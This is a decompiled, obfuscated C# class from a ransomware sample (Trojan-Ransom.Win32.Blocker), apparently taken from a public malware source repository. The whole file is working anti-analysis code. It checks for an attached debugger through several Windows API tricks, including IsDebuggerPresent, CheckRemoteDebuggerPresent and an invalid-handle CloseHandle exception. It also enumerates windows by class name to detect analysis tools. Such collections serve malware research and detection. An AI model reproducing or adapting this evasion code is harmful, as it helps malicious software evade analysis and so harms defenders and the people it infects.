MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c6483995e04301d945fdc8bbbeb2fdfcb.cs

215 lines
9.7 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: A.c6483995e04301d945fdc8bbbeb2fdfcb
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace A
{
internal class c6483995e04301d945fdc8bbbeb2fdfcb
{
internal const uint c815d7d663eef3c44b2caa9f3d6111388 = 1024;
internal const uint ce1a64a0ce40f52be8d5cd5f2ab8d4bec = 64;
internal const int c9e8de4583ee928c4800269558d166b7e = 0;
private static bool c75ea3b951856ad38b52cbf8b6402d522;
[DllImport("kernel32.dll", EntryPoint = "SetLastError")]
internal static extern void c391cc9da68ba80667b423713f74af35b(
uint c3c2d28d090853af7ce1e2c9436d4e6b3);
[DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
internal static extern int cace4d6faccfae54b4cce02f5ff6a9d78(
IntPtr c1511c2036aa4b7ba89764385ca9dba92);
[DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
internal static extern IntPtr ccfa0dd8bc046c30e43dcac27b0790853(
uint c104f3bd454450b5fae258ea4698c08fa,
int c7e99aabe62df3fabf80d42cf90e0e3f0,
uint c56f77053e15999af6844efc9bdde822d);
[DllImport("kernel32.dll", EntryPoint = "GetCurrentProcessId")]
internal static extern uint c30c15026493b976c2325f72361ac915c();
[DllImport("kernel32.dll", EntryPoint = "LoadLibrary", CharSet = CharSet.Auto, SetLastError = true)]
internal static extern IntPtr c70f94891cb4225163b481930fa82b941(
string c17f152cc83728b20f2e2e392435ccca5);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c808000474b78cc57ff5e0ac36b3fcc73 cb3b55426f89535f91bb419e6996e2646(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cc055647fecedcfcae1eaf4bbad26d609 c6dbc9e316fddad0a9f7623fb3be9ceff(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cdf87155547dda952c916d9b76727151f(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c4d8130fdf16941c5a049e8c5637a73b3(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c8b9df66c099e027db7fe27eeb5d97544 c823a12567a85c9243ae40e47539c1cbb(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c7dda1f225a33dfcf98fae6f7e3f67461(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
private static int c084af11cdc465888c3ed538fb3591a27(
IntPtr c157a4097f532e5292cc2957be55db66e,
IntPtr c3ac7a813ea74272766c650f10278c114)
{
string[] strArray = new string[1]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2181)
};
string strA = c6483995e04301d945fdc8bbbeb2fdfcb.c8859338e5a3695a878c4bf6705d5751e(c157a4097f532e5292cc2957be55db66e);
foreach (string strB in strArray)
{
if (string.Compare(strA, strB, true) == 0)
{
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = true;
return 0;
}
}
return 1;
}
[DllImport("user32.dll", EntryPoint = "GetClassName", CharSet = CharSet.Auto)]
internal static extern int cbb7fbb3e253592177be35000370dc20a(
IntPtr c3ffd86e445fc1629a21a22d8b6f86a4b,
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490,
int c668f9f3a61afe17d1174701f81735e18);
internal static string c8859338e5a3695a878c4bf6705d5751e(
IntPtr c5de7cfd6591e65c25b36e0738fcc29da)
{
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490 = new StringBuilder(260);
c6483995e04301d945fdc8bbbeb2fdfcb.cbb7fbb3e253592177be35000370dc20a(c5de7cfd6591e65c25b36e0738fcc29da, cb9c6716f9fec7a6b7c9e19bedc9f2490, cb9c6716f9fec7a6b7c9e19bedc9f2490.Capacity);
return cb9c6716f9fec7a6b7c9e19bedc9f2490.ToString();
}
internal static void cface76737f299c15f46aea51d2f361b6()
{
if (c6483995e04301d945fdc8bbbeb2fdfcb.ca73ad72d5e801fc691a6bdacf00b1e12())
throw new Exception(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2196));
}
internal static bool ca73ad72d5e801fc691a6bdacf00b1e12()
{
try
{
if (Debugger.IsAttached)
return true;
IntPtr c6b70c3224512397ad0c3a2798d87e490 = c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2352));
c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c9d3e290b2a38dccd6dec3b8cbf70f0c7 = c6483995e04301d945fdc8bbbeb2fdfcb.c4d8130fdf16941c5a049e8c5637a73b3(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2377));
if (c9d3e290b2a38dccd6dec3b8cbf70f0c7 != null && c9d3e290b2a38dccd6dec3b8cbf70f0c7() != 0)
return true;
IntPtr num1 = c6483995e04301d945fdc8bbbeb2fdfcb.ccfa0dd8bc046c30e43dcac27b0790853(1024U, 0, c6483995e04301d945fdc8bbbeb2fdfcb.c30c15026493b976c2325f72361ac915c());
if (num1 != IntPtr.Zero)
{
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cb52fb1903297a0d67737ce529c917679 = c6483995e04301d945fdc8bbbeb2fdfcb.cdf87155547dda952c916d9b76727151f(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2412));
if (cb52fb1903297a0d67737ce529c917679 != null)
{
int pbDebuggerPresent = 0;
if (cb52fb1903297a0d67737ce529c917679(num1, ref pbDebuggerPresent) != 0)
{
if (pbDebuggerPresent != 0)
return true;
}
}
}
finally
{
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(num1);
}
}
bool flag = false;
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(new IntPtr(305419896));
}
catch
{
flag = true;
}
if (flag)
return true;
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c92e35801b4eaae7ab7d70e17c0173e9c = c6483995e04301d945fdc8bbbeb2fdfcb.c7dda1f225a33dfcf98fae6f7e3f67461(c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2465)), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2486));
if (c92e35801b4eaae7ab7d70e17c0173e9c != null)
{
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = false;
int num2 = c92e35801b4eaae7ab7d70e17c0173e9c(new c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737(c6483995e04301d945fdc8bbbeb2fdfcb.c084af11cdc465888c3ed538fb3591a27), IntPtr.Zero);
if (c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522)
return true;
}
}
catch
{
}
}
catch
{
}
return false;
}
[StructLayout(LayoutKind.Sequential)]
internal class c35ad2d2b7d5d5e5e9092a2e2f7ca2384
{
internal IntPtr c7ba91d8fad77443c443bf7d678c49ce5;
internal IntPtr cbd073e7d3c73e14c44cb6a8c7608c269;
internal IntPtr ce57239c4110302077b325d4f0ddc2a7e;
internal IntPtr cbe6898bbda725d30c0f429c4e8b0262e;
internal IntPtr c4517ace766e7dab5ea383c670cb1d2eb;
internal IntPtr c6609b7e1d07cfe2dc208c6746a4a790d;
}
internal delegate int c808000474b78cc57ff5e0ac36b3fcc73(
IntPtr ProcessHandle,
int ProcessInformationClass,
c6483995e04301d945fdc8bbbeb2fdfcb.c35ad2d2b7d5d5e5e9092a2e2f7ca2384 ProcessInformation,
uint ProcessInformationLength,
out uint ReturnLength);
internal delegate int cc055647fecedcfcae1eaf4bbad26d609(
IntPtr ProcessHandle,
int ProcessInformationClass,
out uint debugPort,
uint ProcessInformationLength,
out uint ReturnLength);
internal delegate int c9d3e290b2a38dccd6dec3b8cbf70f0c7();
internal delegate void c8b9df66c099e027db7fe27eeb5d97544([MarshalAs(UnmanagedType.LPStr)] string lpOutputString);
internal delegate int cb52fb1903297a0d67737ce529c917679(
IntPtr hProcess,
ref int pbDebuggerPresent);
internal delegate int cc2644b96756a32d21ac3b9be2d8f2737(IntPtr wnd, IntPtr lParam);
internal delegate int c92e35801b4eaae7ab7d70e17c0173e9c(
c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737 lpEnumFunc,
IntPtr lParam);
}
}